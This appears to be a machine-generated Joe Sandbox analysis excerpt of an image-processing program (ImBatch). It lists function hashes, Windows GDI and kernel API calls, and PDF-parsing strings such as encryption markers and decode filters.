Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CapsDevice$AbortFileMetaPagePlayProc$ModeSaveStart
String ID: Page $Printing not allowed!
API String ID: 2380074485-545845978
Opcode ID: de40148e7d4605280f4ebc4c1b775c60db37b2dff99892baafb325ed7f2ec545
Instruction ID: 52a733f694337b1df0e3b1b31abe90fb2f5689e96248fa7b88dab8ec238d229d
Opcode Fuzzy Hash: de40148e7d4605280f4ebc4c1b775c60db37b2dff99892baafb325ed7f2ec545
Instruction Fuzzy Hash: 82621974E04218AFDB40EBACC996B9EBBF9EF49301F1040A5F404EB2A5CB75AD44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 1099FFA0 Relevance: 50.1, Strings: 39, Instructions: 1379COMMON

Download Yara Rule

Strings

Encrypt, xrefs: 109A0862, 109A0877
0000000000 65535 f, xrefs: 109A06BE
distiller, xrefs: 109A150B
Size, xrefs: 109A0279
EncryptMetadata, xrefs: 109A09EC
trailer, xrefs: 109A04C2, 109A07FE
CFM, xrefs: 109A0A9B
Producer, xrefs: 109A11BC
Filter, xrefs: 109A089E
Prev, xrefs: 109A02C5, 109A02D9
canon ir2020, xrefs: 109A12D5
Root, xrefs: 109A02F1
obj, xrefs: 109A0060
wpcubed, xrefs: 109A1441
infoprint server, xrefs: 109A140D
synactis, xrefs: 109A12A1
Index, xrefs: 109A01FB
Standard, xrefs: 109A0BBB
Length, xrefs: 109A09D2
meta reports, xrefs: 109A13A5
scanfront, xrefs: 109A1371
Creator, xrefs: 109A122E
xref, xrefs: 109A0378
StdCF, xrefs: 109A0A5E, 109A0A72
expressprinting, xrefs: 109A1475
AESV3, xrefs: 109A0AFA
ERROR in XREF Table, xrefs: 109A07A5
is password protected!, xrefs: 109A1091
AESV2, xrefs: 109A0ACF
oracle, xrefs: 109A14A9
d2evision, xrefs: 109A13D9
adobe pdf, xrefs: 109A133D
None, xrefs: 109A0AB1
pdfscanlib, xrefs: 109A1309
password=", xrefs: 109A0E17
Cannot open PDF file without password!, xrefs: 109A10B0
ghostscript, xrefs: 109A14DA
Cannot decrypt this file!, xrefs: 109A0BC9
File , xrefs: 109A1083

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID: is password protected!$ obj$0000000000 65535 f$AESV2$AESV3$CFM$Cannot decrypt this file!$Cannot open PDF file without password!$Creator$ERROR in XREF Table$Encrypt$EncryptMetadata$File $Filter$Index$Length$None$Prev$Producer$Root$Size$Standard$StdCF$adobe pdf$canon ir2020$d2evision$distiller$expressprinting$ghostscript$infoprint server$meta reports$oracle$password="$pdfscanlib$scanfront$synactis$trailer$wpcubed$xref
API String ID: 0-2493714411
Opcode ID: 6989cc7b1f540300ac88b6a4f855d6bbe088351de81df68f4c532aa4858f2071
Instruction ID: c5307c023b47700d6fe8b36f28ef77a4ccdfc873f3c28bed09757a9ea886f444
Opcode Fuzzy Hash: 6989cc7b1f540300ac88b6a4f855d6bbe088351de81df68f4c532aa4858f2071
Instruction Fuzzy Hash: 47D25B74E0425ACFCB51DB68C895BAEB7B5FF84344F1081A9E908AB355CB34AD85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 10855770 Relevance: 48.5, APIs: 32, Instructions: 503windowCOMMON

Download Yara Rule

APIs

GetObjectW.GDI32(00000000,00000054,?,00000000,?,?,?,10856270,?,?,00000000,10856298,?,?,?), ref: 108557F0
GetDC.USER32(00000000), ref: 10855801
CreateCompatibleDC.GDI32(00000000), ref: 10855812
CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1085585E
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 10855882
SelectObject.GDI32(?,?), ref: 10855ADF
SelectPalette.GDI32(?,00000000,00000000), ref: 10855B1F
RealizePalette.GDI32(?), ref: 10855B2B
SetTextColor.GDI32(?,00000000), ref: 10855B94
SetBkColor.GDI32(?,00000000), ref: 10855BAF
SetDIBColorTable.GDI32(?,00000000,00000002,00000000,?,00000000,?,00000000,?,?,?,?,00000000,00000000,10855D3F), ref: 10855BF8
FillRect.USER32 ref: 10855B7C

Part of subcall function 1084E910: GetSysColor.USER32(00000028), ref: 1084E91A

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 10855C1A
CreateCompatibleDC.GDI32(00000000), ref: 10855C2D
SelectObject.GDI32(?,00000000), ref: 10855C50
SelectPalette.GDI32(?,00000000,00000000), ref: 10855C6C
RealizePalette.GDI32(?), ref: 10855C77
SetTextColor.GDI32(?,00000000), ref: 10855C95
SetBkColor.GDI32(?,00000000), ref: 10855CB0
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 10855CD8
SelectPalette.GDI32(?,00000000,000000FF), ref: 10855CEA
SelectObject.GDI32(?,00000000), ref: 10855CF4
DeleteDC.GDI32(?), ref: 10855D0F

Part of subcall function 1084FB84: EnterCriticalSection.KERNEL32(10857DDA,?,?,?,00000000,10855DC1,?,00000000,00000000,?,?,?,10856270,?,?,00000000), ref: 1084FBAC
Part of subcall function 1084FB84: CreateBrushIndirect.GDI32(?), ref: 1084FC39
Part of subcall function 1084FB84: LeaveCriticalSection.KERNEL32(?,1084FC6D,10857DDA,?,?,?,00000000,10855DC1,?,00000000,00000000,?,?,?,10856270,?), ref: 1084FC60

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapCriticalRealizeSectionText$BrushDeleteEnterFillIndirectLeaveRectTable
String ID:
API String ID: 3271313764-0
Opcode ID: bf5ba4ad498d4a763ed01476500da1b57b7095138bf6e3b7ef7dcd1b354b7d28
Instruction ID: 8b305f9ed56ff0c56b128302385633fb07e4e2d3f97d730f8a7aa772630cc6f3
Opcode Fuzzy Hash: bf5ba4ad498d4a763ed01476500da1b57b7095138bf6e3b7ef7dcd1b354b7d28
Instruction Fuzzy Hash: 4312C475A08208AFDB40DFA8C895F9EB7B8EF08310F518555F918EB2A1D774ED84CB60

Uniqueness

Uniqueness Score: -1.00%

Function 109AC404 Relevance: 35.8, Strings: 28, Instructions: 787COMMON

Download Yara Rule

Strings

JPXDecode, xrefs: 109AC98F
Height, xrefs: 109AC7CA, 109ACCA6
CCF, xrefs: 109AC731
FLATEDECODE, xrefs: 109AC4FC
DCTDecode, xrefs: 109AC6CB
RUNLENGTHDECODE, xrefs: 109AC5FC
Wrong Syntax for "Filter" (2), xrefs: 109ACDE8
LZWDECODE, xrefs: 109AC67C
BlackIs1, xrefs: 109AC8E6
JBIG2Globals, xrefs: 109ACB02
CCITTFaxDecode, xrefs: 109AC715
Width, xrefs: 109AC7B2, 109ACC85
ASCIIHexDecode, xrefs: 109AC4B4
FLATEDECOD, xrefs: 109AC518
Columns, xrefs: 109AC832
RUNLENGTHD, xrefs: 109AC618
DecodeParms, xrefs: 109AC756, 109ACA3C
EndOfLine, xrefs: 109AC88B
Rows, xrefs: 109AC85F
JBIG2Decode, xrefs: 109ACA11
RLE, xrefs: 109AC650
Dont know how to , xrefs: 109ACD49, 109ACDAB
ASCII85DECODE, xrefs: 109AC46C
AHx, xrefs: 109AC4D0
LZW, xrefs: 109AC698
A85, xrefs: 109AC488
EncodedByteAlign, xrefs: 109AC8B2
DCT, xrefs: 109AC6E7

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID:
String ID: A85$AHx$ASCII85DECODE$ASCIIHexDecode$BlackIs1$CCF$CCITTFaxDecode$Columns$DCT$DCTDecode$DecodeParms$Dont know how to $EncodedByteAlign$EndOfLine$FLATEDECOD$FLATEDECODE$Height$JBIG2Decode$JBIG2Globals$JPXDecode$LZW$LZWDECODE$RLE$RUNLENGTHD$RUNLENGTHDECODE$Rows$Width$Wrong Syntax for "Filter" (2)
API String ID: 0-1414192544
Opcode ID: 96f44fe079747637a0f2b2ee644ee8b639e2faf472777ed0ece086b5a0103942
Instruction ID: 3a4bd928a00aed9cf9a78cad1dabbace3c681a196c767e0dad4d2ab39ca9f537
Opcode Fuzzy Hash: 96f44fe079747637a0f2b2ee644ee8b639e2faf472777ed0ece086b5a0103942
Instruction Fuzzy Hash: C7723A78A04249DFCB01DF68C895A9EB7F5EF49354F2081A8E8159F365DB30ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10809E64 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 152stringlibraryfileCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 10809E81
GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 10809E98
lstrcpynW.KERNEL32(?,?,?), ref: 10809EC8
lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 10809F37
lstrcpynW.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 10809F7F
FindFirstFileW.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 10809F92
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 10809FA8
lstrlenW.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?,?), ref: 10809FB4
lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,?), ref: 10809FF0
lstrlenW.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 10809FFC
lstrcpynW.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 1080A01F

Strings

kernel32.dll, xrefs: 10809E7C
GetLongPathNameW, xrefs: 10809E8F
\, xrefs: 10809FC6

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameW$\$kernel32.dll
API String ID: 3245196872-3908791685
Opcode ID: bbee275163849a201b4236b4f4ab86109235f9c98a0d5403cfecd091a3a6755b
Instruction ID: ed2c0e22e9b1296c2f6d4d1f5b36807f7af91c2acf485c3cc10584decea35cdd
Opcode Fuzzy Hash: bbee275163849a201b4236b4f4ab86109235f9c98a0d5403cfecd091a3a6755b
Instruction Fuzzy Hash: B4516C76E04619EFCB10DAA8CC85ADEB3FCEF04310F0446A6A654E7244EBB5EE44CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10A3B05C Relevance: 14.6, APIs: 4, Strings: 4, Instructions: 602windowCOMMON

Download Yara Rule

APIs

Part of subcall function 108078A0: SysAllocStringLen.OLEAUT32(?,?), ref: 108078AE

SendMessageW.USER32(?,0000044E,0000006E,?), ref: 10A3B557
SendMessageW.USER32(?,0000044E,00000074,00000001), ref: 10A3B598
SendMessageW.USER32(?,0000044E,0000006F,00000000), ref: 10A3B60B
SendMessageW.USER32(?,0000044E,00000070,00000000), ref: 10A3B74B

Strings

SELECTED, xrefs: 10A3B186
selected, xrefs: 10A3B360
odd, xrefs: 10A3B2AC
even, xrefs: 10A3B306

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: MessageSend$AllocString
String ID: SELECTED$even$odd$selected
API String ID: 348148221-1777954622
Opcode ID: 79e8f0a24a1d8bd4f10c935dcade6dfafc7ab10d30bdf39e50f42f942527b085
Instruction ID: a487387d98b72baf2a4492715e55e0bcd8bb6f5db89454298b77c5322cbf4b64
Opcode Fuzzy Hash: 79e8f0a24a1d8bd4f10c935dcade6dfafc7ab10d30bdf39e50f42f942527b085
Instruction Fuzzy Hash: 49323734A242499FEB00DFA9C881A9EBBF6FF48351F118065EA44EF265D731ED85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10A00C70 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 208sleepCOMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 10A00F21

Part of subcall function 109F8794: EnterCriticalSection.KERNEL32(?,?,?,10A001B6,00000000,10A5A37C,00000000,10A5A469,?,00000000,10A5A48C,?,?,?,?), ref: 109F879F
Part of subcall function 109F8794: LeaveCriticalSection.KERNEL32(?,?,?,?,10A001B6,00000000,10A5A37C,00000000,10A5A469,?,00000000,10A5A48C,?,?,?,?), ref: 109F87B2

InterlockedIncrement.KERNEL32(-00000048), ref: 10A00CE3
Sleep.KERNEL32(0000000A,-00000048), ref: 10A00CEC
InterlockedCompareExchange.KERNEL32(-00000050,00000000,00000000), ref: 10A00D07
EnterCriticalSection.KERNEL32(?), ref: 10A00D19
LeaveCriticalSection.KERNEL32(?,10A00D5D), ref: 10A00D50

Strings

Stop Thread, xrefs: 10A00CC7
Initialize Viewer Stage 1, xrefs: 10A00C7E

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalSection$Interlocked$EnterLeave$CompareDecrementExchangeIncrementSleep
String ID: Initialize Viewer Stage 1$Stop Thread
API String ID: 1632168941-2715198399
Opcode ID: 7b850438c96a6a7624281e35a62e1aafb8c82e66a25fbddf1780f1a245423ea9
Instruction ID: f6bb783c825a1cf609bb0c72ead25c2f9e05fd8a5ff72e5a4acae111fbc04892
Opcode Fuzzy Hash: 7b850438c96a6a7624281e35a62e1aafb8c82e66a25fbddf1780f1a245423ea9
Instruction Fuzzy Hash: B891D574A44609EFD705DF99C685E9DB7F5FF48200F2982F5E808AB326D730AE419B50

Uniqueness

Uniqueness Score: -1.00%

Function 10A59EE0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

UpdateStatus, xrefs: 10A5A0B6
Load from file: , xrefs: 10A59F2F
Initialize Painter, xrefs: 10A5A050
Initialize Viewer, xrefs: 10A5A071

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438463364.0000000010AEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010AEB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B1F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438471945.0000000010B23000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10800000_ImBatch.jbxd

Similarity

API ID: CriticalEnterSection
String ID: Initialize Painter$Initialize Viewer$Load from file: $UpdateStatus
API String ID: 1904992153-4154364625
Opcode ID: 934c4b3b290113f132b19ebabbce22a04cf504e31b5f422a91def91aab0ae990
Instruction ID: 5452af5f241584d0208ff933e6eb4251229f139c5bdee41f9f2fbdca46dcbd41
Opcode Fuzzy Hash: 934c4b3b290113f132b19ebabbce22a04cf504e31b5f422a91def91aab0ae990
Instruction Fuzzy Hash: 67610578A04208AFDB05CF69C9A5ADDBBF6FF49310F4584B4F8449B361CB30A945CA90

Uniqueness

Uniqueness Score: -1.00%

Function 1099C380 Relevance: 7.9, Strings: 6, Instructions: 434COMMON

Download Yara Rule

Strings

XXXXXXXN, xrefs: 1099C3C8
Z, xrefs: 1099C5D6
Unknown file format, xrefs: 1099C4E3
, xrefs: 1099C3F6
%PDF-1., xrefs: 1099C486, 1099C4CA
xref, xrefs: 1099C854

Memory Dump Source

Source File: 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp, Offset: 10800000, based on PE: true

Associated: 00000003.00000002.437294282.0000000010800000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438308113.0000000010A7D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438331392.0000000010A80000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438341932.0000000010A81000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438358272.0000000010A85000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A87000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438366150.0000000010A98000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438411709.0000000010A9F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438424490.0000000010AE0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438436214.0000000010AE2000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438444863.0000000010AE3000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.438451258.0000000010AE5000.00000008.00000001.01000000.00000008.sdmpDownload File
